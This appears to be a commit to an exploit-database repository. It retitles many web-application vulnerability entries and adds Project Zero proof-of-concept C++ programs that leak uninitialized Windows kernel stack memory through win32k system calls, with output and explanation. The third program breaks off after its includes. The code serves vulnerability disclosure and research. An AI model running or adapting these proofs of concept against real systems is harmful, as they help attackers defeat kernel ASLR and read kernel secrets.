Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injections ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections Paliz Portal - Cross-Site Scripting / Multiple SQL Injection Paliz Portal - Cross-Site Scripting / Multiple SQL Injections Sphider 1.3.x - Admin Panel Multiple SQL Injection Sphider 1.3.x - Admin Panel Multiple SQL Injections Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injection Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections EasyGallery 5 - 'index.php' Multiple SQL Injection EasyGallery 5 - 'index.php' Multiple SQL Injections Xenon - 'id' Parameter Multiple SQL Injection Xenon - 'id' Parameter Multiple SQL Injections eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections Dolibarr ERP/CRM - /user/index.php Multiple Parameter SQL Injection Dolibarr ERP/CRM - /user/info.php id Parameter SQL Injection Dolibarr ERP/CRM - /admin/boxes.php rowid Parameter SQL Injection Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting Manx 1.0.1 - /admin/admin_blocks.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections Balero CMS 0.7.2 - Multiple Blind SQL Injection Balero CMS 0.7.2 - Multiple Blind SQL Injections WordPress Plugin'WP Mobile Edition 2.7 - Remote File Disclosure WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/plugin.php page Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting PHP Designer 2007 - Personal Multiple SQL Injection PHP Designer 2007 Personal - Multiple SQL Injections WordPress Plugin All-in-One Event Calendar 1.4 agenda-widget.php Multiple Parameter Cross-Site Scripting WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter Cross-Site Scripting XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting XM Forum - 'id' Parameter Multiple SQL Injection XM Forum - 'id' Parameter Multiple SQL Injections AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple Parameter SQL Injections Classified Ads Script PHP - 'admin.php' Multiple SQL Injection Classified Ads Script PHP - 'admin.php' Multiple SQL Injections Limny - 'index.php' Multiple SQL Injection Limny - 'index.php' Multiple SQL Injections TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection jCore - /admin/index.php path Parameter Cross-Site Scripting jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting Netsweeper 4.0.8 - SQL Injection Authentication Bypass Netsweeper 4.0.8 - SQL Injection / Authentication Bypass dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injections MantisBT 1.2.19 - Host Header Attack MantisBT 1.2.19 - Host Header Exploit WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Parameter Cross-Site Scripting PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/linktick.php site Parameter SQL Injection PHP Address Book - /addressbook/register/reset_password.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection PHP Address Book - /addressbook/register/traffic.php var Parameter SQL Injection PHP Address Book - /addressbook/register/user_add_save.php email Parameter SQL Injection PHP Address Book - /addressbook/register/checklogin.php 'Username' Parameter SQL Injection PHP Address Book - /addressbook/register/admin_index.php q Parameter SQL Injection PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection Hero Framework - /users/login 'Username' Parameter Cross-Site Scripting Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Parameter Cross-Site Scripting Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery D-Link DIR-816L Wireless Router - Cross-Site Request Forgery Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injections NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection C2C Forward Auction Creator 2.0 - /auction/asp/list.asp pa Parameter SQL Injection C2C Forward Auction Creator - /auction/casp/Admin.asp SQL Injection Admin Authentication Bypass C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass) Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection Command School Student Management System - /sw/admin_sgrades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_media_codes_1.php id Parameter SQL Injection Command School Student Management System - /sw/admin_infraction_codes.php id Parameter SQL Injection Command School Student Management System - /sw/admin_generations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_relations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_titles.php id Parameter SQL Injection Command School Student Management System - /sw/health_allergies.php id Parameter SQL Injection Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure Command School Student Management System - /sw/Admin_change_Password.php Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - /sw/add_topic.php Cross-Site Request Forgery (Topic Creation) Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation) Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection Dredge School Administration System - /DSM/loader.php Account Information Disclosure Dredge School Administration System - /DSM/loader.php Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection UAEPD Shopping Script - /news.php id Parameter SQL Injection UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin) BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin) Professional Designer E-Store - 'id' Parameter Multiple SQL Injection GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injections GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal Xangati - /servlet/Installer file Parameter Directory Traversal Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal Caldera - /costview2/jobs.php tr Parameter SQL Injection Caldera - /costview2/printers.php tr Parameter SQL Injection Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injections ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections Multiple Netgear Routers - Password Disclosure Multiple NETGEAR Routers - Password Disclosure WebKit - Stealing Variables via Page Navigation in FrameLoader::clear WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'
This commit is contained in:
Offensive Security
parent
df0343af6d
commit
86f822c557
12 changed files with 2091 additions and 715 deletions
81
platforms/windows/dos/42223.cpp
Executable file
81
platforms/windows/dos/42223.cpp
Executable file
|
|
@ -0,0 +1,81 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1178
|
||||||
|
|
||||||
|
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory in Windows 7-10 through the win32k!NtGdiExtGetObjectW system call (accessible via a documented GetObject() API function) to user-mode applications.
|
||||||
|
|
||||||
|
The reason for this seems to be as follows: logical fonts in Windows are described by the LOGFONT structure [1]. One of the structure's fields is lfFaceName, a 32-character array containing the typeface name. Usually when logical fonts are created (e.g. with the CreateFont() or CreateFontIndirect() user-mode functions), a large part of the array remains uninitialized, as most font names are shorter than the maximum length. For instance, the CreateFont() API only copies the relevant string up until \0, and leaves the rest of its local LOGFONT structure untouched. In case of CreateFontIndirect(), it is mostly up to the caller to make sure there are no leftover bytes in the structure, but we expect this is rarely paid attention to. The structure is then copied to kernel-mode address space, but can be read back using the GetObject() function, provided that the program has a GDI handle to the logical font.
|
||||||
|
|
||||||
|
Now, it turns out that the trailing, uninitialized bytes of the LOGFONT structure for some of the stock fonts contain left-over kernel stack data, which include kernel pointers, among other potentially interesting information. An example output of the attached proof-of-concept program (which obtains and displays the LOGFONT of the DEVICE_DEFAULT_FONT stock font) started on Windows 7 32-bit is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 10 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: bc 02 00 00 00 00 00 ee 01 02 02 22 53 00 79 00 ..........."S.y.
|
||||||
|
00000020: 73 00 74 00 65 00 6d 00 00 00 29 92 24 86 6d 81 s.t.e.m...).$.m.
|
||||||
|
00000030: fb 4d f2 ad fe ff ff ff 63 76 86 81 76 79 86 81 .M......cv..vy..
|
||||||
|
00000040: 10 38 c7 94 02 00 00 00 00 00 00 00 01 00 00 00 .8..............
|
||||||
|
00000050: d0 03 69 81 10 38 c7 94 04 7a 00 00 ?? ?? ?? ?? ..i..8...z......
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
After the "System" unicode string, we can observe data typical to a function stack frame: a _EH3_EXCEPTION_REGISTRATION structure at offset 0x28:
|
||||||
|
|
||||||
|
.Next = 0x9229???? (truncated)
|
||||||
|
.ExceptionHandler = 0x816d8624
|
||||||
|
.ScopeTable = 0xadf24dfb
|
||||||
|
.TryLevel = 0xfffffffe
|
||||||
|
|
||||||
|
as well as pointers to the ntoskrnl.exe kernel image (0x81867663, 0x81867976, 0x816903d0) and paged pool (0x94c73810). This information is largely useful for local attackers seeking to defeat the kASLR exploit mitigation, and the bug might also allow disclosing other sensitive data stored in the kernel address space. We have confirmed that more data can be easily leaked by querying other stock fonts. It is unclear whether disclosing junk stack data from other user-mode processes which create logical fonts is possible, but this scenario should also be investigated and addressed if necessary.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Get a handle to the stock font.
|
||||||
|
HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
|
||||||
|
if (hfont == NULL) {
|
||||||
|
printf("GetCurrentObject failed\n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Zero-out the logfont memory to prevent any artifacts in the output.
|
||||||
|
LOGFONT logfont;
|
||||||
|
RtlZeroMemory(&logfont, sizeof(logfont));
|
||||||
|
|
||||||
|
// Trigger the bug.
|
||||||
|
if (GetObject(hfont, sizeof(logfont), &logfont) == 0) {
|
||||||
|
printf("GetObject failed\n");
|
||||||
|
DeleteObject(hfont);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Dump the output on screen.
|
||||||
|
PrintHex((PBYTE)&logfont, sizeof(logfont));
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
117
platforms/windows/dos/42224.cpp
Executable file
117
platforms/windows/dos/42224.cpp
Executable file
|
|
@ -0,0 +1,117 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1179
|
||||||
|
|
||||||
|
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetOutlineTextMetricsInternalW system call.
|
||||||
|
|
||||||
|
The system call returns an 8-byte structure back to ring-3 through the 4th parameter, as evidenced by the following assembly code (win32k.sys from Windows 7 32-bit):
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
.text:BF87364A mov edx, [ebp+arg_C]
|
||||||
|
.text:BF87364D lea ecx, [edx+8]
|
||||||
|
.text:BF873650 mov eax, _W32UserProbeAddress
|
||||||
|
.text:BF873655 cmp ecx, eax
|
||||||
|
.text:BF873657 ja short loc_BF873662
|
||||||
|
.text:BF873659 cmp ecx, edx
|
||||||
|
.text:BF87365B jbe short loc_BF873662
|
||||||
|
.text:BF87365D test dl, 3
|
||||||
|
.text:BF873660 jz short loc_BF873665
|
||||||
|
.text:BF873662
|
||||||
|
.text:BF873662 loc_BF873662:
|
||||||
|
.text:BF873662 mov byte ptr [eax], 0
|
||||||
|
.text:BF873665
|
||||||
|
.text:BF873665 loc_BF873665:
|
||||||
|
.text:BF873665 lea esi, [ebp+var_24]
|
||||||
|
.text:BF873668 mov edi, edx
|
||||||
|
.text:BF87366A movsd
|
||||||
|
.text:BF87366B movsd
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
However, according to our experiments, only the first 4 bytes of the source structure (placed on the kernel stack) are initialized under normal circumstances, while the other 4 bytes are set to leftover data. In order to demonstrate the issue, we have created a proof-of-concept program which sprays 1024 bytes of the kernel stack with a 0x41 ('A') byte directly prior to triggering the vulnerability, with the help of the win32k!NtGdiEngCreatePalette system call. Then, the DWORD leaked via the discussed vulnerability is indeed equal to 0x41414141, as evidenced by the PoC output:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
C:\>NtGdiGetOutlineTextMetricsInternalW_stack.exe
|
||||||
|
Data read: 41414141
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
// Own implementation of memset(), which guarantees no data is spilled on the local stack.
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Windows 7 32-bit.
|
||||||
|
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
|
||||||
|
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[1024];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 7 32-bit.
|
||||||
|
CONST ULONG __NR_NtGdiGetOutlineTextMetricsInternalW = 0x10c6;
|
||||||
|
|
||||||
|
// Create a Device Context.
|
||||||
|
HDC hdc = CreateCompatibleDC(NULL);
|
||||||
|
|
||||||
|
// Create a TrueType font.
|
||||||
|
HFONT hfont = CreateFont(10, // nHeight
|
||||||
|
10, // nWidth
|
||||||
|
0, // nEscapement
|
||||||
|
0, // nOrientation
|
||||||
|
FW_DONTCARE, // fnWeight
|
||||||
|
FALSE, // fdwItalic
|
||||||
|
FALSE, // fdwUnderline
|
||||||
|
FALSE, // fdwStrikeOut
|
||||||
|
ANSI_CHARSET, // fdwCharSet
|
||||||
|
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
|
||||||
|
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
|
||||||
|
DEFAULT_QUALITY, // fdwQuality
|
||||||
|
FF_DONTCARE, // fdwPitchAndFamily
|
||||||
|
L"Times New Roman");
|
||||||
|
|
||||||
|
// Select the font into the DC.
|
||||||
|
SelectObject(hdc, hfont);
|
||||||
|
|
||||||
|
// Spray the kernel stack to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Read the 4 uninitialized kernel stack bytes and print them on screen.
|
||||||
|
DWORD output[2] = { /* zero padding */ };
|
||||||
|
if (!SystemCall32(__NR_NtGdiGetOutlineTextMetricsInternalW, hdc, 0, NULL, output)) {
|
||||||
|
printf("NtGdiGetOutlineTextMetricsInternalW failed\n");
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("Data read: %x\n", output[1]);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
91
platforms/windows/dos/42225.cpp
Executable file
91
platforms/windows/dos/42225.cpp
Executable file
|
|
@ -0,0 +1,91 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1180
|
||||||
|
|
||||||
|
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other systems untested) through the win32k!NtGdiGetTextMetricsW system call.
|
||||||
|
|
||||||
|
The output structure used by the syscall, according to various sources, is TMW_INTERNAL, which wraps the TEXTMETRICW and TMDIFF structures (see e.g. the PoC for issue #480 ). The disclosure occurs when the service is called against a Device Context with one of the stock fonts selected (we're using DEVICE_DEFAULT_FONT). Then, we can find 7 uninitialized kernel stack bytes at offsets 0x39-0x3f of the output buffer. An example output of the attached proof-of-concept program started on Windows 7 32-bit is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 10 00 00 00 0d 00 00 00 03 00 00 00 03 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 07 00 00 00 0f 00 00 00 bc 02 00 00 ................
|
||||||
|
00000020: 00 00 00 00 60 00 00 00 60 00 00 00 20 00 22 21 ....`...`... ."!
|
||||||
|
00000030: ac 20 20 00 00 00 00 21 ee[03 81 ff 35 64 36 8f]. ....!....5d6.
|
||||||
|
00000040: 20 ff 80 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? .. ............
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Here, the leaked bytes are "03 81 ff 35 64 36 8f". If we map the 0x39-0x3f offsets to the layout of the TMW_INTERNAL structure, it turns out that the 7 bytes in question correspond to the 3 alignments bytes past the end of TEXTMETRICSW (which itself has an odd length of 57 bytes), and the first 4 bytes of the TMDIFF structure.
|
||||||
|
|
||||||
|
Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
